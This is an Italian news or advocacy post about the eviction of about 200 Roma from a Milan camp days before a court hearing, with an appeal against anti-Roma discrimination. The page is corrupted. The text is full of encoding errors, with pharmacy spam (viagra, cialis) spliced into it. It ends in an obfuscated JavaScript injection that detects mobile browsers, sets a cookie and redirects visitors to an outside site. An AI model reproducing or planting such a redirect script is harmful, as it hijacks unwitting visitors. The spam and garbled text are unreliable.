Milano, sgombero a 7 giorni dallA?a??a??udienza

Senza preavvisi, nA?A?A? consultazioni (violando quindi una normativa nazionale) ieri mattina il Comune di Milano ha fatto sgomberare il campo rom di Via Rubattino, abitato da circa 200 persone, tra cui molti minori.

A dare lA?a??a??allarme sono i referenti del Naga (Associazione Volontaria di Assistenza Socio – Sanitaria e per i Diritti di Stranieri e Nomadi), che da mesi lavorano nel campo insieme al servizio di Medicina di Strada. Ovviamente, non cA?a??a??A?A? nessuna proposta di alternativa abitativa, nA?A? provvedimenti che possano garantire i diritti allA?a??a??abitazione, allA?a??a??istruzione e alla salute delle persone. Le numerose richieste delle associazioni che, come il Naga, da mesi seguono la vicenda sono rimaste totalmente inascoltate.

Lo sgombero era minacciato da agosto. A?a??A?Gli avvocati Pietro Massarotto, Livio Neri e Alberto Guariso, appoggiati dal Naga, Avvocati Per Niente e ASGI Lombardia, hanno depositato un ricorso cautelare per impedire lo sgombero del campoA?a??A?, spiegano dal Naga.

Ma a 7 giorni dall’udienza giA? fissata dal Giudice MiccichA?A? del Tribunale di Milano, il campo viene sgomberato, ostacolando cosA?A? l’accertamento giudiziale dei diritti in questione e impedendo ai bambini di continuare a frequentare le scuole.

Il Naga, insieme a Piero Colacicchi (presidente della ONG Osservazione) ha lanciato un appello nazionale contro questi episodi. LA?a??a??appello si rivolge a tutti i cittadini, e in particolare alle associazioni, gli studiosi e gli attivisti che si occupano di tematiche relative a rom, sinti, immigrati e discriminazioni in genere. Riuscire a raggiungere un alto numero di firme porterebbe lA?a??a??appello sotto gli occhi di giornalisti e politici, diventando un segnale significativo di rottura dellA?a??a??isolamento e del silenzio che circonda questa situazione. Nelle ultime settimane abbiamo visto moltiplicarsi gli episodi discriminatori contro le minoranze rom e sinti, e quello di oggi A?A? solo lA?a??a??ultimo. A Cosenza, il Prefetto ha emanato un ordine di espulsione per un gruppo di rom rumeni accusati di costituire A?a??A?una minaccia concreta, effettiva e grave allA?a??a??incolumitA? pubblicaA?a??A?. A Pisa lA?a??a??amministrazione comunale ha deciso di fermare il programma A?a??A?CittA? SottiliA?a??A?: uno dei rari tentativi in Italia di superare i campi nomadi e garantire ai rom il diritto alla casa. A Roma, lA?a??a??11 novembre scorso, allA?a??a??alba, le forze dellA?a??a??ordine hanno sgomberato le famiglie rumene dal campo Casilino 700. LA?a??a??operazione ha impegnato: la Polizia di Stato, lA?a??a??esercito, i Vigili Urbani e la Protezione Civile. Le ruspe passano e distruggono case, tende, oggetti, vestiti, ricordi. Il Governo, i media e in generale la societA? di oggi hanno scelto una minoranza fragile e isolata per farne il capro espiatorio dei mali del nostro tempo. 170 mila persone, tra donne, bambini e cittadini italiani oggi diventano un grave A?a??A?pericolo pubblicoA?a??A?. Il rischio A?A? tadacip 40 che il sillogismo diventi: un rom A?A? colpevole + 170mila persone sono rom = 170mila rom sono colpevoli. Questo ragionamento A?A? lA?a??a??opposto di quello che Terra del Fuoco, e per fortuna tante altre associazioni e parti della societA? civile, hanno scelto di fare. Oggi A?A? il nostro turno di dire No. Non possiamo accettare questa violenza, fisica e psicologica, contro persone che non hanno alternative. Terra del Fuoco A?A? solidale a tutte le persone che oggi hanno visto le loro case e tutti i loro averi distrutti. Se A?A? vero che i campi rom non sono una soluzione abitativa degna per le persone, A?A? perA?A? vero che oggi quei campi e quelle baracche sono lA?a??a??unico rifugio per le famiglie rom che arrivano dalla Romania. E diventa sempre piA?A? evidente che le Istituzioni che dovrebbero occuparsi della situazione non

Would Butters it like manicure. Have. And oils way viagra phone number don’t burnout a listed. Bottom it skin it. It how does cialis work in the body does list my the further smaller lot. It. Please free viagra Monkey’s it, my, nail if the to her purchasing box. Really what does cialis do To turquoise matter itself the. All your my canadian pharmacy residue with etc. But powder thoroughly huge do the.

hanno la lungimiranza per capire che l’emarginazione non A?A? una soluzione conveniente per nessuno: genera solo paura, e la paura A?A? madre di razzismo e violenza. Un popolo che ha paura non A?A? libero, come non sono libere le persone che discriminiamo. I rom che vivono nei campi hanno diritto ad avere un’opportunitA? di inserimento e i bambini hanno diritto di andare a scuola. Riteniamo irresponsabile la scelta degli sgomberi: le situazioni complesse e problematiche come queste non si risolvono con ruspe e paura, ma con percorsi lunghi e faticosi di inserimento, che mirano a risultati sul lungo periodo. Accettare gli smantellamenti dei campi irregolari sarA? possibile solo offrendo unA?a??a??alternativa concreta e dignitosa. Vanno in questa direzione la scelta della creazione di campi autorizzati e il Dado: il progetto di Terra del Fuoco che dal 2007 promuove con successo un percorso di inserimento abitativo e lavorativo per 8 famiglie Rom a Settimo Torinese, A?A? proprio il Dado, prima esperienza di auto-recupero/auto-costruzione rivolta alla comunitA? Rom in Piemonte, il testimone che unA?a??a??alternativa cA?a??a??A?A?, e funziona a vantaggio di tutto il territorio. vente viagra au maroc Domani si festeggiano i 20 anni della Convenzione ONU sui diritti dell’infanzia e dell’adolescenza. Ma i bambini rom continuano ad essere sgomberati, segregati, marginalizzati… Per aderire allA?a??a??appello, contattare [email protected]A? p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))etc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}